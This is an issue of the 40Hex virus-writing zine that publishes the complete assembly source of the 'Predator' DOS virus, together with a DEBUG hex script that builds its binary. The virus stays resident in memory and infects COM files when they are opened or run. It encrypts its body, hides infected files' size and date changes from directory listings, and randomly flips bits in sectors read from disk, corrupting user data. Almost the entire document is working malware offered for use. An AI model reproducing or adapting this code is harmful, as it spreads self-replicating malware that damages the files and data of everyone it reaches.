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40Hex Issue 11 File 008

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Published in 
 · 13 Jul 2024

40Hex Issue 11 Volume 3 Number 2                                      File 008 


Predator is a virus written by Phalcon/Skism's newest member, Priest. It
incorporates a number of stealth features. It infects only COM files.
Predator uses the "Century" technique of marking a virus infection; file dates
are bumped up 100 years to designate an infection.

--Predator Source Code---------------------------------------------------------
ORG 0h

; Source code of the Predator

; Priest

Its_Me equ 'IM'

Read_Only equ 1

Mem_Size equ offset Finish-offset Virus_Start ;amount of memory needed

Virus_Size equ offset Virus_End-offset Virus_Start ;size of virus
New_Virus_Size equ offset Finish-offset New_Virus ;size of virus w/

Hundred_Years equ 0c8h

Version equ 30h ;Get DOS Version
Open equ 3dh ;Open File
Ext_Open equ 6ch ;Extended Open File
Execute equ 4bh ;Execute
Find_FCB equ 11h ;Find File Control Block
Find_FCB_Next equ 12h ;Find next FCB
Open_FCB equ 0fh ;Open FCB
Get_DTA equ 2fh ;Get DTA address
Find_Dir equ 4eh ;Find file
Find_Dir_Next equ 4fh ;Find next file

Attribute equ 1 ;infection flags
Opened equ 2
Written equ 4

Extended_FCB equ 0ffh ;Extended FCB will have the first
;byte equal to FFh

Virus_Start: mov sp,bp ;restore Stack after decryption
sti ;interrupts on
mov ah,Version
mov bx,Its_Me
int 21h ;Check if already resident
cmp ax,Its_Me
jne Go_Res
Jump_R_F: jmp Return_File
Go_Res: mov ax,cs
dec ax ;get segment of this MCB
MCB_ds: mov ds,ax
cmp byte ptr ds:[0],'Z' ;must be last Memory Control Block
jne Jump_R_F
Found_last_MCB: mov ax,Mem_Size ;Reserve enough for virus + data
mov cl,4h
shr ax,cl ;convert to paragraphs
inc ax
push ax
dec ax
shr ax,cl
shr cl,1
shr ax,cl ;convert to kilobytes
inc ax
push ds
xor bx,bx
mov ds,bx
sub word ptr ds:[413h],ax ;take memory from int 12
pop ds
pop ax
sub word ptr ds:[0003h],ax ;take it from availible memory
mov ax,cs
add ax,ds:[0003h] ;get segment of free memory
mov es,ax
push cs
pop ds
call $+3 ;next 3 instructions find Virus_Start
pop si
sub si,(offset $-1)-offset Virus_Start
xor di,di
mov cx,Mem_Size
rep movsb ;copy us to High Memory
push es
mov ax,offset High_Start
push ax
retf ;jump up there

Virus_Name: db 'Predator virus '
Copyright: db '(c) Mar. 93 '
Me: db 'Priest'

File_Bytes db 0cdh, 20h, 0h ;first 3 bytes of infected .com file

Com_Spec: db '.COM',0h ;only .com files can be infected

High_Start: push cs
pop ds
mov ax,3521h ;get address of Int 21
int 21h
mov word ptr ds:[Int_21],bx ;save it
mov word ptr ds:[Int_21+2h],es
mov al,13h ;get address of Int 13
int 21h
mov word ptr ds:[Int_13],bx ;save it
mov word ptr ds:[Int_13+2h],es
mov ah,25h ;point Int 13 to our handler
mov dx,offset New_13
int 21h
mov al,21h ;21h too
mov dx,offset New_21
int 21h
xor ax,ax
mov ds,ax
mov ax,ds:[46ch] ;get a random number for
push cs ; activation task
pop ds
xchg al,ah
add word ptr ds:[Count_Down],ax ;Save it for count down
Return_File: push ss
pop es
mov di,100h
call $+3 ;get address of first 3 bytes of .com file
pop si
sub si,(offset $-1)-offset File_Bytes
push ss
push di
movsw ;move them
push ss
pop ds
xor ax,ax
retf ;jump to original program

New_21: cmp ah,Open ;check function
je Infect
cmp ah,Ext_Open
je Ext_File_Open
cmp ah,Execute
je Infect
cmp ah,Find_FCB
je Stealth_FCB
cmp ah,Find_FCB_Next
je Stealth_FCB
cmp ah,Open_FCB
je Stealth_FCB_O
cmp ah,Find_Dir
je Stealth_Dir
cmp ah,Find_Dir_Next
je Stealth_Dir
cmp ah,Version ;other checking for us
jne Jump_21
cmp bx,Its_Me
jne Jump_21
mov ax,bx ;tell other that we're here
Ret_21: retf 0002h
Jump_21: jmp cs:Int_21

Stealth_Dir: jmp Hide_Find
Stealth_FCB: jmp Hide_FCB
Stealth_FCB_O: jmp Hide_FCB_O

Infect_Error_J: jmp Infect_Error
Ext_File_Open: mov word ptr cs:[File_Pnt],si ;Extended open uses DS:SI
jmp short Infect_ds
Infect: mov word ptr cs:[File_Pnt],dx ;Open & Execute use DS:DX
Infect_ds: mov word ptr cs:[File_Pnt+2h],ds
mov byte ptr cs:[Infect_Status],0h ;zero out progress byte
call Push_All ;Push all registers
call Hook_24 ;Hook Int 24 to avoid errors being displayed
call Is_Com ;Is it a .com file?
jb Infect_Error_J ;Carry flag set if it is not
lds dx,cs:[File_Pnt] ;get saved address of file name
mov ax,4300h ;fetch the attribute
push ax
call Old_21
pop ax
jb Infect_Error_J
mov byte ptr cs:[File_Attr],cl ;save attribute
test cl,Read_Only ;no need to change if not read only
je No_Attr_Rem
xor cx,cx
inc al
call Old_21 ;if read only, then zero out
jb Infect_Error_J
or byte ptr cs:[Infect_Status],Attribute ;update progress byte
No_Attr_Rem: mov ax,3dc2h ;open with write/compatibility
call Old_21
jb Infect_Error_J
xchg ax,bx ;handle into bx
push cs
pop ds
or byte ptr ds:[Infect_Status],Opened ;update progress byte
mov ax,5700h ;get date
call Old_21
cmp dh,Hundred_Years ;is it infected?
jnb Infect_Error
add dh,Hundred_Years ;else add 100 years to date
mov word ptr ds:[File_Date],dx ;save modified date
mov word ptr ds:[File_Time],cx
mov ah,3fh ;read first 3 bytes
mov cx,3h
mov dx,offset File_Bytes
call Old_21
cmp ax,cx ;if error, then quit
jne Infect_Error
cmp word ptr ds:[File_Bytes],'MZ' ;no .exe files
je Infect_Error
cmp word ptr ds:[File_Bytes],'ZM'
je Infect_Error
mov al,2 ;set file pointer to end of file
call Set_Pnt
or dx,dx ;too big?
jne Infect_Error
cmp ax,1000 ;too small?
jb Infect_Error
cmp ax,0-2000 ;still too big?
ja Infect_Error
mov di,offset Jump_Bytes ;make a jump to end of file
push ax
add ax,100h ;these two are for the encryption
mov word ptr ds:[Decrypt_Start_Off+1],ax
push cs
pop es
mov al,0e9h ;e9h = JMP xxxx
pop ax
sub ax,3h ; to end of file
call Encrypt_Virus ;encrypt the virus
mov ah,40h ;write the encrypted virus and the
;decryption routine to file
mov dx,offset New_Virus
mov cx,New_Virus_Size
call Old_21
jb Infect_Error
or byte ptr ds:[Infect_Status],Written ;update progress byte
xor al,al ;set file pointer to
call Set_Pnt ;beginning of file
mov ah,40h ;write the jump
mov dx,offset Jump_Bytes
mov cx,3h
call Old_21
Infect_Error: test byte ptr cs:[Infect_Status],Opened ;was file opened?
je Set_Attr
test byte ptr cs:[Infect_Status],Written ;was file written to?
je Close
mov ax,5701h ;if infected, restore modified date
mov dx,cs:[File_Date]
mov cx,ds:[File_Time]
call Old_21
Close: mov ah,3eh ;close file
call Old_21
Set_Attr: test byte ptr cs:[Infect_Status],Attribute ;attribute changed?
je Jump_Old_21
mov ax,4301h ;if changed, then restore it
xor cx,cx
mov cl,cs:[File_Attr]
lds dx,cs:[File_Pnt]
call Old_21
Jump_Old_21: call Unhook_24 ;unhook Int 24
call Pop_All ;pop all registers
jmp Jump_21 ;jump to original int 21

Set_Pnt: mov ah,42h ;set file pointer w/ al as parameter
xor cx,cx
cwd ;zero out dx
call Old_21

Pop_All: pop word ptr cs:[Ret_Add] ;save return address
pop es
pop ds
pop si
pop di
pop bp
pop dx
pop cx
pop bx
pop ax
jmp cs:[Ret_Add] ;jump to return address

Push_All: pop word ptr cs:[Ret_Add] ;save return address
push ax
push bx
push cx
push dx
push bp
push di
push si
push ds
push es
jmp cs:[Ret_Add] ;jump to return address

Hook_24: call Push_All ;push all registers
mov ax,3524h ;get int 24 address
call Old_21
mov word ptr cs:[Int_24],bx ;save address
mov word ptr cs:[Int_24+2h],es
mov ah,25h ;set new address to us
push cs
pop ds
mov dx,offset New_24
call Old_21
call Pop_All ;pop all registers

Unhook_24: call Push_All
mov ax,2524h ;set old address back
lds dx,cs:[Int_24]
Call Old_21
call Pop_All

New_24: mov al,3h ;int 24, fail

Old_21: pushf ;call to original int 21
call cs:Int_21

;Hide_Find hides the file size increase for functions 4eh and 4fh and the
;date change

Hide_Find: call Old_21 ;do the search
call Push_All ;push all registers
jb Hide_File_Error
mov ah,2fh ;get DTA address
call Old_21
cmp byte ptr es:[bx.DTA_File_Date+1h],Hundred_Years ;Is it
jb Hide_File_Error ;infected?
sub byte ptr es:[bx.DTA_File_Date+1h],Hundred_Years ;Take

;away 100 years from date

sub word ptr es:[bx.DTA_File_Size],New_Virus_Size ;take

;away Virus_Size from file size

sbb word ptr es:[bx.DTA_File_Size+2],0 ;subtract remainder

;although there will not be one
; I included it for expandibility
; (i.e. infecting .exe files)
Hide_File_Error:call Pop_All ;pop all registers
jmp Ret_21

;Hide_FCB hides the file size increase for functions 11h and 12h and the
;date change

Hide_FCB: call Old_21 ;find file
call Push_All ;push registers
or al,al ;al=0 if no error
jne Hide_FCB_Error
mov ah,Get_DTA ;get address of DTA
call Old_21
cmp byte ptr ds:[bx],Extended_FCB ;is it an extended FCB?
jne Hide_FCB_Reg
add bx,7h ;yes, add 7 to address to skip garbage

Hide_FCB_Reg: cmp byte ptr es:[bx.DS_Date+1h],Hundred_Years ;Is it infected?
jb Hide_FCB_Error
sub byte ptr es:[bx.DS_Date+1h],Hundred_Years ;yes, restore

sub word ptr es:[bx.DS_File_Size],New_Virus_Size ;fix size
sbb word ptr es:[bx.DS_File_Size+2],0 ;and remainder
Hide_FCB_Error: call Pop_All ;pop all registers
jmp Ret_21

;Hide_FCB_O hides the file size increase for function 0fh and the
;date change

Hide_FCB_O: call Old_21 ;open FCB
call Push_All ;push all registers
cmp al,0h ;al=0 if opened, else error
jne Hide_FCB_O_Error
mov bx,dx ;pointer into bx

cmp byte ptr ds:[bx],Extended_FCB ;is it an extended FCB?
jne Hide_FCB_No_E
add bx,7h ;yes, add 7 to skip garbage

Hide_FCB_No_E: cmp byte ptr ds:[bx.FCB_File_Date+1h],Hundred_Years ;infected?
jb Hide_FCB_O_Error
sub byte ptr ds:[bx.FCB_File_Date+1h],Hundred_Years ;yes,
;fix date

sub word ptr ds:[bx.FCB_File_Size],New_Virus_Size ;fix size
sbb word ptr ds:[bx.FCB_File_Size+2h],0 ;and remainder
Hide_FCB_O_Error:call Pop_All ;pop all registers
jmp Ret_21

Is_Com: push cs
pop ds
les di,ds:[File_Pnt] ;get address of file
xor al,al
mov cx,7fh
repne scasb ;scan for null byte at end of file name
cmp cx,7fh-5h ;must be at least 5 bytes long,
;including ext. (.COM)
jnb Is_Not_Com
mov cx,5h ;compare last five bytes to ".COM",0
sub di,cx
mov si,offset Com_Spec ;offset of ".COM",0
rep cmpsb ;compare them
jne Is_Not_Com
clc ;if .com file, then clear carry flag
Is_Not_Com: stc ;else set it

;This is the interrupt 13 handle, it's sole purpose is to complement a
;random bit after a random number of sectors (1-65535) have been read.

New_13: cmp ah,2h ;Is a sector going to be read
je Read_Sector
Jump_13: jmp cs:Int_13 ;no, continue on
Ret_13: call Pop_All ;pop all registers
retf 0002h
Read_Sector: mov byte ptr cs:[Sub_Value],al ;save number of sectors read
call cs:Int_13 ;read the sectors
call Push_All ;push flags
jb Ret_13 ;jump if error to return
mov al,cs:[Sub_Value] ;get number of sectors read
sub word ptr cs:[Count_Down],ax ;subtract it from our count
ja Ret_13 ;down
mov bx,200h ;200h bytes per sector
cwd ;zero dx
mul bx ;mul # of sectors by 200
dec ax ;minus one
xor cx,cx
mov ds,cx
mov cx,ds:[46ch] ;get random value
mov word ptr cs:[Count_Down],cx ;move it into count down
push cx
and cx,ax ;cx must be < ax
add bx,cx ;add it to the address of
pop cx ;where the sectors were read
add cl,ch ;randomize cl
rcr word ptr es:[bx],cl ;get a random bit
cmc ;reverse it
rcl word ptr es:[bx],cl ;put it back
jmp short Ret_13 ;jump to return

;The Encrypt_Virus module copies the decryption routine and an encrypted
;copy of the virus to a buffer

Encrypt_Virus: xor ax,ax
mov ds,ax
mov ax,ds:[46ch] ;get random value
push cs
pop ds
add byte ptr ds:[Decrypt_Value],al ;use as encryption key
mov al,ds:[Decrypt_Value] ;get encryption key
add ah,al ;randomize ah
add byte ptr ds:[Decrypt_Random],ah ;put random garbage
mov si,offset Decrypt_Code ;copy decryption routine
mov di,offset New_Virus
mov cx,offset Decrypt_End-offset Decrypt_Code
rep movsb ;to buffer
mov si,offset Virus_Start ;copy virus
mov cx,((Virus_Size)/2)+1
Encrypt_Loop: xchg ax,cx
push ax
rol ax,cl ;and encrypt
not ax
stosw ;to buffer
pop ax
xchg ax,cx
loop Encrypt_Loop
dec di ;fix pointer for
dec di ;decryption routine
sub di,offset New_Virus ;point decryption's SP to end of
;encrypted code for proper

add word ptr ds:[New_Virus+(Decrypt_Start_Off+1-Decrypt_Code)],di

;Decryption routine

Decrypt_Code: mov dx,((Virus_Size)/2)+1
db 0b1h ;mov cl,
Decrypt_Value db ?
mov bp,sp
Decrypt_Start_Off:mov sp,1234h
Decrypt_Loop: pop ax
not ax
ror ax,cl
push ax
jmp short $+3
Decrypt_Random: db 12h
dec sp
dec sp
dec dx
jne Decrypt_Loop

db ?

Jump_Bytes db 3 dup(0)

Int_13 dd ?
Int_21 dd ?
Int_24 dd ?

Ret_Add dw ?

File_Pnt dd ?

Infect_Status db ?

File_Time dw ?
File_Date dw ?
File_Attr db ?

Count_Down dw ?
Sub_Value db ?

New_Virus db Virus_Size+(offset Decrypt_End-offset Decrypt_Code)+1 dup(0)


;various structures

Directory STRUC
DS_Drive db ?
DS_File_Name db 8 dup(0)
DS_File_Ext db 3 dup(0)
DS_File_Attr db ?
DS_Reserved db 10 dup(0)
DS_Time dw ?
DS_Date dw ?
DS_Start_Clust dw ?
DS_File_Size dd ?
Directory ENDS

FCB_Drive db ?
FCB_File_Name db 8 dup(0)
FCB_File_Ext db 3 dup(0)
FCB_Block dw ?
FCB_Rec_Size dw ?
FCB_File_Size dd ?
FCB_File_Date dw ?
FCB_File_Time dw ?
FCB_Reserved db 8 dup(0)
FCB_Record db ?
FCB_Random dd ?

DTA_Reserved db 21 dup(0)
DTA_File_Attr db ?
DTA_File_Time dw ?
DTA_File_Date dw ?
DTA_File_Size dd ?
DTA_File_Name db 13 dup(0)

END Virus_Start
--Predator Debug Script--------------------------------------------------------
e 0100 8B E5 FB B4 30 BB 4D 49 CD 21 3D 4D 49 75 03 E9
e 0110 AF 00 8C C8 48 8E D8 80 3E 00 00 5A 75 F1 B8 64
e 0120 08 B1 04 D3 E8 40 50 48 D3 E8 D0 E9 D3 E8 40 1E
e 0130 33 DB 8E DB 29 06 13 04 1F 58 29 06 03 00 8C C8
e 0140 03 06 03 00 8E C0 0E 1F E8 00 00 5E 81 EE 4B 00
e 0150 33 FF B9 64 08 FC F3 A4 06 B8 89 00 50 CB 50 72
e 0160 65 64 61 74 6F 72 20 76 69 72 75 73 20 20 28 63
e 0170 29 20 4D 61 72 2E 20 39 33 20 20 50 72 69 65 73
e 0180 74 CD 20 00 2E 43 4F 4D 00 0E 1F B8 21 35 CD 21
e 0190 89 1E 1D 04 8C 06 1F 04 B0 13 CD 21 89 1E 19 04
e 01A0 8C 06 1B 04 B4 25 BA 6D 03 CD 21 B0 21 BA D8 00
e 01B0 CD 21 33 C0 8E D8 A1 6C 04 0E 1F 86 C4 01 06 31
e 01C0 04 16 07 BF 00 01 E8 00 00 5E 81 EE 48 00 16 57
e 01D0 FC A5 A4 16 1F 33 C0 CB 80 FC 3D 74 4B 80 FC 6C
e 01E0 74 3F 80 FC 4B 74 41 80 FC 11 74 2C 80 FC 12 74
e 01F0 27 80 FC 0F 74 25 80 FC 4E 74 1A 80 FC 4F 74 15
e 0200 80 FC 30 75 0B 81 FB 4D 49 75 05 8B C3 CA 02 00
e 0210 2E FF 2E 1D 04 E9 9A 01 E9 C5 01 E9 FA 01 E9 DC
e 0220 00 2E 89 36 27 04 EB 05 2E 89 16 27 04 2E 8C 1E
e 0230 29 04 2E C6 06 2B 04 00 E8 26 01 E8 37 01 E8 08
e 0240 02 72 DB 2E C5 16 27 04 B8 00 43 50 E8 5C 01 58
e 0250 72 CC 2E 88 0E 30 04 F6 C1 01 74 0F 33 C9 FE C0
e 0260 E8 48 01 72 B9 2E 80 0E 2B 04 01 B8 C2 3D E8 3A
e 0270 01 72 AB 93 0E 1F 80 0E 2B 04 02 B8 00 57 E8 2A
e 0280 01 80 FE C8 73 77 80 C6 C8 89 16 2E 04 89 0E 2C
e 0290 04 B4 3F B9 03 00 BA 81 00 E8 0F 01 3B C1 75 5D
e 02A0 81 3E 81 00 5A 4D 74 55 81 3E 81 00 4D 5A 74 4D
e 02B0 B0 02 E8 8F 00 0B D2 75 44 3D E8 03 72 3F 3D 30
e 02C0 F8 77 3A BF 16 04 50 05 00 01 A3 05 04 0E 07 B0
e 02D0 E9 FC AA 58 2D 03 00 AB E8 E2 01 B4 40 BA 34 04
e 02E0 B9 30 04 E8 C5 00 72 15 80 0E 2B 04 04 32 C0 E8
e 02F0 52 00 B4 40 BA 16 04 B9 03 00 E8 AE 00 2E F6 06
e 0300 2B 04 02 74 1C 2E F6 06 2B 04 04 74 0F B8 01 57
e 0310 2E 8B 16 2E 04 8B 0E 2C 04 E8 8F 00 B4 3E E8 8A
e 0320 00 2E F6 06 2B 04 01 74 12 B8 01 43 33 C9 2E 8A
e 0330 0E 30 04 2E C5 16 27 04 E8 70 00 E8 58 00 E8 0C
e 0340 00 E9 CC FE B4 42 33 C9 99 E8 5F 00 C3 2E 8F 06
e 0350 25 04 07 1F 5E 5F 5D 5A 59 5B 58 9D 2E FF 26 25
e 0360 04 2E 8F 06 25 04 9C 50 53 51 52 55 57 56 1E 06
e 0370 2E FF 26 25 04 E8 E9 FF B8 24 35 E8 2D 00 2E 89
e 0380 1E 21 04 2E 8C 06 23 04 B4 25 0E 1F BA A8 02 E8
e 0390 19 00 E8 B8 FF C3 E8 C8 FF B8 24 25 2E C5 16 21
e 03A0 04 E8 07 00 E8 A6 FF C3 B0 03 CF 9C 2E FF 1E 1D
e 03B0 04 C3 E8 F6 FF E8 A9 FF 72 20 B4 2F E8 EC FF 26
e 03C0 80 BF 19 00 C8 72 13 26 80 AF 19 00 C8 26 81 AF
e 03D0 1A 00 30 04 26 83 9F 1C 00 00 E8 70 FF E9 2D FE
e 03E0 E8 C8 FF E8 7B FF 0A C0 75 28 B4 2F E8 BC FF 80
e 03F0 3F FF 75 03 83 C3 07 26 80 BF 1A 00 C8 72 13 26
e 0400 80 AF 1A 00 C8 26 81 AF 1D 00 30 04 26 83 9F 1F
e 0410 00 00 E8 38 FF E9 F5 FD E8 90 FF E8 43 FF 3C 00
e 0420 75 21 8B DA 80 3F FF 75 03 83 C3 07 80 BF 15 00
e 0430 C8 72 10 80 AF 15 00 C8 81 AF 10 00 30 04 83 9F
e 0440 12 00 00 E8 07 FF E9 C4 FD 0E 1F C4 3E 27 04 32
e 0450 C0 B9 7F 00 FC F2 AE 83 F9 7A 73 0F B9 05 00 2B
e 0460 F9 BE 84 00 FC F3 A6 75 02 F8 C3 F9 C3 80 FC 02
e 0470 74 0B 2E FF 2E 19 04 E8 D3 FE CA 02 00 2E A2 33
e 0480 04 9C 2E FF 1E 19 04 E8 D7 FE 72 EB 2E A0 33 04
e 0490 98 2E 29 06 31 04 77 DF BB 00 02 99 F7 E3 48 33
e 04A0 C9 8E D9 8B 0E 6C 04 2E 89 0E 31 04 51 23 C8 03
e 04B0 D9 59 02 CD 26 D3 1F F5 26 D3 17 EB BA 33 C0 8E
e 04C0 D8 A1 6C 04 0E 1F 00 06 00 04 A0 00 04 02 E0 00
e 04D0 26 0F 04 BE FC 03 BF 34 04 B9 19 00 FC F3 A4 BE
e 04E0 00 00 B9 0C 02 91 50 AD D3 C0 F7 D0 AB 58 91 E2
e 04F0 F4 4F 4F 81 EF 34 04 01 3E 3D 04 C3 BA 0C 02 B1
e 0500 00 FA 8B EC BC 34 12 58 F7 D0 D3 C8 50 EB 01 12
e 0510 4C 4C 4A 75 F2 00 00 00 00 00 00 00 00 00 00 00
e 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0830 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0840 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0850 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0860 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
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